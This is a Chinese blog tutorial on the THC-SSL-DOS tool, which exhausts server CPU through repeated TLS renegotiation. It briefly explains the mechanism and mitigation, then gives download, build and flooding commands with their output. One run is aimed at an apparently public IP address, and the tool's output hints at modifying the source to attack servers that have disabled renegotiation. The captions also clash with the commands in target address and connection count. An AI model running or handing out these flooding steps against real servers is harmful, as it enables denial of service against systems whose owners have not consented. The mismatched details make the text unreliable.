thc-ssl-dos 压力测试工具

时间：2018-12-01 20:21:37 阅读：1607 评论：0 收藏：0 [点我收藏+]

标签：dos ack cti target image limit iat color lob

德国黑客组织“The Hacker’s Choice”发布了工具THC SSL DOS，与传统DDoS工具不同的是，只需要一台执行单一攻击的电脑就能迅速消耗服务器资源，造成服务器拒绝服务。这个攻击方式的本质是消耗服务器的CPU资源，在协商加密算法的时候服务器CPU的开销是客户端的 15 倍左右。而Renegotiating机制让攻击者可以在一个TCP连接中不停的快速重新协商，如果建立多个连接则服务端的压力更为可怕，而且这种攻击建立的连接数很少导致难以被察觉。从漏洞形成原因中，我们看到 Renegotiating机制可以让攻击者在一个TCP连接中不停的快速重新协商，由此可知，我们可以通过禁用Renegotiating机制来实现延缓此类拒绝攻击。但是其只能相对延缓，仍然不能彻底解决问题。如果通过客户端模拟多次请求连接，则依然会出现服务器端消耗资源过大的情况。由于德国黑客组织提供的工具THC SSL DOS目前只针对Renegotiations Enabled的情况.

技术分享图片

0x01 下载安装

wget https://github.com/vanhauser-thc/THC-Archive/blob/master/Exploits/thc-ssl-dos-1.4.tar.gz
tar zxvf thc-ssl-dos-1.4.tar.gz
cd thc-ssl-dos-1.4
./configure && make

#使用帮助

root@kali:~# thc-ssl-dos -h

     ______________ ___  _________
     \__    ___/   |   \ \_   ___        |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org
          Twitter @hackerschoice
Greetingz: the french underground
./thc-ssl-dos [options]  
  -h      help
  -l   Limit parallel connections [default: 400]

0x02 使用示例

使用100 连接(-l 100), 对目标IP（192.168.1.208）及其端口（443）进行泛洪攻击。

root@kali:~# thc-ssl-dos -l 500 192.168.1.208 443 --accept
 \__    ___/   |   \ \_   ___        |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
     |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org
          Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err

使用100 连接(-l 100), 对目标IP（111.13.101.208）及其端口（443）进行泛洪攻击。

root@kali:~# thc-ssl-dos -l 500 183.222.100.112 443 --accept

     ______________ ___  _________
     \__    ___/   |   \ \_   ___        |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org
          Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].

thc-ssl-dos 压力测试工具

标签：dos ack cti target image limit iat color lob

原文地址：https://www.cnblogs.com/a1d4m/p/10050480.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行